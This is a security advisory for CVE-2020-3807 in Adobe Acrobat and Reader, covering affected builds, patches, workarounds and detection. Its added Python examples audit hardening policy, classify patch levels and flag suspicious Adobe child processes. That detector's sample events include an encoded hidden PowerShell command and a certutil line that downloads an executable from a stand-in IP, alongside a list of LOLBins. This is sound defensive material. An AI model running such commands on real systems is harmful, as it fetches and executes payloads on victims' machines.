CVE-2020-3807

9.8 CRITICAL

📋 TL;DR

CVE-2020-3807 is a critical buffer error (memory corruption) vulnerability in Adobe Acrobat and Acrobat Reader, fixed by Adobe in APSB20-13. A crafted PDF that triggers it lets the attacker run arbitrary code with the privileges of the user who opened the file. No authentication or network access to the victim is required; the only precondition is that a user opens the document. Every installation of a vulnerable build on either release track (continuous or classic) is affected.

💻 Affected Systems

Products:
  • Adobe Acrobat DC
  • Adobe Acrobat Reader DC
  • Adobe Acrobat 2017
  • Adobe Acrobat Reader 2017
  • Adobe Acrobat 2015
  • Adobe Acrobat Reader 2015
Versions: Acrobat DC/Reader DC: 2020.006.20034 and earlier; Acrobat 2017/Reader 2017: 2017.011.30158 and earlier; Acrobat 2015/Reader 2015: 2015.006.30510 and earlier
Operating Systems: Windows, macOS
Default Config Vulnerable: ⚠️ Yes
Notes: All default installations of affected versions are vulnerable. The vulnerability affects both continuous and classic track releases.

📦 What is this software?

Adobe Acrobat is Adobe's desktop PDF editor; Acrobat Reader is the free viewer built on the same code base and is one of the most widely installed desktop applications in corporate environments. Both parse every PDF a user opens, including email attachments and browser downloads, so a bug in the file parser is reachable by anyone who can get a document in front of a user.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise with attacker gaining full control over the victim's computer, potentially leading to data theft, ransomware deployment, or lateral movement within the network.

🟠

Likely Case

Malicious PDF files delivered via phishing emails or malicious websites lead to system compromise of individual users, potentially resulting in credential theft, data exfiltration, or malware installation.

🟢

If Mitigated

With proper security controls like application whitelisting, network segmentation, and user awareness training, impact is limited to isolated incidents that can be contained and remediated quickly.

🌐 Internet-Facing: HIGH
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires user interaction (opening a malicious PDF) but no authentication, and there are no network-side preconditions. Given the CVSS score and the install base of Adobe Reader, treat weaponization as likely even without a public PoC. Note that the 9.8 score corresponds to a vector without user interaction; for the realistic scenario (a local file opened by the victim, UI:R, AV:L) the same impact scores 7.8, which is the figure to use when ranking this against other client-side bugs.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Acrobat DC/Reader DC: 2020.006.20042 or later; Acrobat 2017/Reader 2017: 2017.011.30166 or later; Acrobat 2015/Reader 2015: 2015.006.30518 or later

Vendor Advisory: https://helpx.adobe.com/security/products/acrobat/apsb20-13.html

Restart Required: Yes

Instructions:

1. Open Adobe Acrobat or Reader.
2. Go to Help > Check for Updates.
3. Follow the prompts to download and install the available update.
4. Restart the application when prompted.
5. Verify the update under Help > About Adobe Acrobat/Reader: the version shown must be at or above the patched build for your track.

🔧 Temporary Workarounds

Disable JavaScript in Adobe Reader

Applies to: all platforms

Disabling JavaScript removes the trigger for many PDF-based exploits and shrinks the attack surface, at the cost of breaking forms and other scripted PDFs. Adobe's advisory does not state whether this particular bug needs JavaScript to reach, so treat this as defence in depth rather than a fix. The preference below is per user and can be re-enabled by the user; on managed hosts enforce it through Adobe's enterprise lockdown policy rather than relying on the per-user setting.

Edit > Preferences > JavaScript > Uncheck 'Enable Acrobat JavaScript'

Use Protected View

Applies to: Windows only

Protected Mode (Reader's sandbox, on by default in Reader DC on Windows) and Protected View (which opens a file read-only inside that sandbox, with saving, printing and similar actions disabled until the user explicitly trusts the file) do not stop the overflow from being triggered, but they contain the resulting code execution. Set Protected View to cover all files, not just files from potentially unsafe locations, and keep Enhanced Security enabled. Neither feature exists in the macOS builds, so macOS hosts must patch.

Edit > Preferences > Security (Enhanced): check 'Enable Protected Mode at startup', set 'Protected View' to 'All files', and check 'Enable Enhanced Security'
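An added example, not from Adobe or the original page, that audits whether both workarounds above are actually enforced by policy on a Windows host rather than left to the user's preferences. It parses the text that `reg query` prints for the Reader DC FeatureLockDown policy key; the key path and value names (bDisableJavaScript, bProtectedMode, iProtectedView, bEnhancedSecurityStandalone) are assumptions drawn from Adobe's Enterprise Toolkit preference reference and should be confirmed there, and the query output embedded below is constructed sample data.

```python
"""Audit Adobe Reader DC hardening policy from `reg query` output.

Added example; not Adobe's code and not from the original page. Run
    reg query "HKLM\\SOFTWARE\\Policies\\Adobe\\Acrobat Reader\\DC\\FeatureLockDown"
on the host, feed the output to parse_reg_query(), then audit_lockdown().
Value names are assumptions taken from Adobe's Enterprise Toolkit preference
reference; confirm them against that reference before relying on this.
"""
import re

# Constructed sample output in the layout `reg query` emits on Windows.
# iProtectedView is deliberately 0x1 (unsafe locations only), not 0x2 (all files).
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Adobe\Acrobat Reader\DC\FeatureLockDown
    bDisableJavaScript    REG_DWORD    0x1
    bProtectedMode    REG_DWORD    0x1
    iProtectedView    REG_DWORD    0x1
    bEnhancedSecurityStandalone    REG_DWORD    0x1
"""

# name, type, data separated by runs of whitespace; key-path lines do not match.
VALUE_LINE = re.compile(r"^\s*(\S+)\s+(REG_\w+)\s+(.*?)\s*$")


def parse_reg_query(text):
    """Return {value_name: int} for the REG_DWORD values in reg query output."""
    values = {}
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if not m:
            continue
        name, kind, raw = m.groups()
        if kind == "REG_DWORD":
            values[name] = int(raw, 16)  # reg query prints DWORDs as 0x...
    return values


def audit_lockdown(values):
    """Map each control to True when the policy enforces the hardened setting.

    A missing value is reported as not enforced: the user preference then
    decides, and the user can flip it back.
    """
    return {
        "javascript_disabled": values.get("bDisableJavaScript") == 1,
        "protected_mode": values.get("bProtectedMode") == 1,
        "protected_view_all_files": values.get("iProtectedView") == 2,
        "enhanced_security": values.get("bEnhancedSecurityStandalone") == 1,
    }


if __name__ == "__main__":
    result = audit_lockdown(parse_reg_query(SAMPLE_REG_QUERY))
    for control, ok in result.items():
        print(f"{control:26} {'enforced' if ok else 'NOT enforced'}")
```

On the constructed sample the audit reports JavaScript, Protected Mode and Enhanced Security as enforced but Protected View as not, because the policy only covers files from unsafe locations; that is the gap the workaround above tells you to close.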

🧯 If You Can't Patch

  • Implement application control/whitelisting to prevent execution of unauthorized code
  • Use network segmentation to isolate vulnerable systems and limit lateral movement

🔍 How to Verify

Check if Vulnerable:

Open Adobe Acrobat/Reader, go to Help > About Adobe Acrobat/Reader, and compare version number against affected ranges.

Check Version:

On Windows (enumerates MSI-installed products, which can take a while): wmic product where "name like 'Adobe%Acrobat%'" get name,version
On macOS: /usr/bin/mdls -name kMDItemVersion /Applications/Adobe\ Acrobat\ Reader\ DC.app

Verify Fix Applied:

After updating, verify version is 2020.006.20042 or later (DC), 2017.011.30166 or later (2017), or 2015.006.30518 or later (2015).
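The comparison behind the three checks above, as an added example that is not Adobe's code and not part of the original page: it parses Acrobat/Reader version strings, picks the release track, and reports a build as vulnerable when it is older than the patched build for that track. The track heuristic (2017.011.* is the 2017 classic track, 2015.006.* is the 2015 classic track, anything else is continuous DC) is my simplification, and the host inventory is constructed sample data.

```python
"""Classify Acrobat/Reader builds against the CVE-2020-3807 fixed versions.

Added example; not from Adobe or the original page. Feed it the version
strings collected from Help > About, wmic or mdls and it tells you which
hosts still need the APSB20-13 update.
"""

# Patched builds from APSB20-13, keyed by release track.
FIXED = {
    "DC (continuous)": (2020, 6, 20042),
    "2017 (classic)": (2017, 11, 30166),
    "2015 (classic)": (2015, 6, 30518),
}


def parse_version(s):
    """'2020.006.20034' -> (2020, 6, 20034). Raises ValueError if malformed."""
    parts = s.strip().split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unexpected Acrobat version format: {s!r}")
    return tuple(int(p) for p in parts)


def track_for(version):
    """Assumed heuristic: classic tracks keep a fixed year.minor prefix."""
    if version[:2] == (2017, 11):
        return "2017 (classic)"
    if version[:2] == (2015, 6):
        return "2015 (classic)"
    return "DC (continuous)"


def is_vulnerable(version_str):
    """True when the build predates the patched build for its track."""
    v = parse_version(version_str)
    return v < FIXED[track_for(v)]


# Constructed inventory: (hostname, version as reported by the tools above).
SAMPLE_INVENTORY = [
    ("ws-01", "2020.006.20034"),  # last unpatched continuous build
    ("ws-02", "2020.006.20042"),  # patched continuous build
    ("ws-03", "2017.011.30158"),  # last unpatched 2017 classic build
    ("ws-04", "2015.006.30518"),  # patched 2015 classic build
    ("ws-05", "2019.021.20061"),  # older continuous build, still vulnerable
]


def vulnerable_hosts(inventory):
    """Hostnames whose reported build is below the fix for its track."""
    return [host for host, ver in inventory if is_vulnerable(ver)]


if __name__ == "__main__":
    for host, ver in SAMPLE_INVENTORY:
        state = "VULNERABLE" if is_vulnerable(ver) else "patched"
        print(f"{host:8} {ver:16} {track_for(parse_version(ver)):16} {state}")
```

Tuple comparison does the right thing here; comparing the strings lexically would not, because "2020.006.20042" and "2020.006.20034" differ only in the third field and older continuous builds such as 2019.021.x must still count as vulnerable.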

📡 Detection & Monitoring

Log Indicators:

  • Application Error (Event ID 1000) or Windows Error Reporting (Event ID 1001) events naming AcroRd32.exe or Acrobat.exe as the faulting application, especially right after a document is opened; a failed exploit attempt usually shows up as a crash before a successful one does
  • Unusual process creation from Adobe processes
  • Suspicious file access patterns from Adobe processes

Network Indicators:

  • Outbound connections from Adobe processes to suspicious IPs/domains
  • Unusual DNS queries from systems running Adobe Reader

SIEM Query:

source="*adobe*" AND (event_id=1000 OR event_id=1001) AND (process_name="AcroRd32.exe" OR process_name="Acrobat.exe")

Both parenthesised groups matter: without the second one the trailing OR matches every Acrobat.exe event regardless of event ID. Pair this crash query with a process-creation rule for children of the two Reader/Acrobat binaries, which is the higher-signal indicator of a successful exploit.
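The "unusual process creation from Adobe processes" indicator above, as an added example (not from the original page) run over constructed process-creation events. The records are JSON lines in the shape a Sysmon Event ID 1 forwarder might emit; the field names (ParentImage, Image, CommandLine, User, Computer) and the list of suspicious child binaries are assumptions to be mapped onto your own schema and allow-list, and none of the hosts, users or URLs are real.

```python
"""Flag script interpreters and LOLBins spawned by Acrobat or Reader.

Added example; not from the original page. Adobe's binaries legitimately
spawn their own helper processes (RdrCEF.exe, the updater) but never a
shell or scripting host, so an Adobe parent plus such a child is worth an
alert on its own, independent of which CVE was used to get there.
"""
import json
from pathlib import PureWindowsPath

ADOBE_PARENTS = {"acrord32.exe", "acrobat.exe"}

# Children Acrobat has no business launching after a PDF is opened (assumed list).
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
}

# Constructed sample events (not real telemetry), one JSON object per line.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"EventID": 1, "Computer": "ws-01", "User": "CORP\\alice",
     "ParentImage": r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe",
     "Image": r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe",
     "CommandLine": "RdrCEF.exe --type=renderer"},
    {"EventID": 1, "Computer": "ws-01", "User": "CORP\\alice",
     "ParentImage": r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"EventID": 1, "Computer": "ws-02", "User": "CORP\\bob",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir"},
    {"EventID": 1, "Computer": "ws-03", "User": "CORP\\carol",
     "ParentImage": r"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c certutil -urlcache -f http://198.51.100.7/a.exe a.exe"},
])


def basename(path):
    """Case-folded file name of a Windows path; works on any host OS."""
    return PureWindowsPath(path).name.lower()


def is_suspicious(event):
    """Adobe parent plus a scripting host or LOLBin child is alert-worthy."""
    if event.get("EventID") != 1:
        return False
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    return parent in ADOBE_PARENTS and child in SUSPICIOUS_CHILDREN


def detect(jsonl):
    """Return (computer, user, parent, command line) for each suspicious event."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if is_suspicious(ev):
            hits.append((ev["Computer"], ev["User"],
                         basename(ev["ParentImage"]), ev["CommandLine"]))
    return hits


if __name__ == "__main__":
    for computer, user, parent, cmd in detect(SAMPLE_EVENTS):
        print(f"ALERT {computer} {user}: {parent} spawned {cmd}")
```

The first sample event (Reader spawning its own RdrCEF.exe renderer) and the third (explorer.exe spawning cmd.exe) are benign and must not fire; the PowerShell and certutil children of the Adobe binaries do. Tune SUSPICIOUS_CHILDREN rather than ADOBE_PARENTS when you see false positives.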

🔗 References

  • Adobe Security Bulletin APSB20-13: https://helpx.adobe.com/security/products/acrobat/apsb20-13.html
  • NVD entry for CVE-2020-3807: https://nvd.nist.gov/vuln/detail/CVE-2020-3807
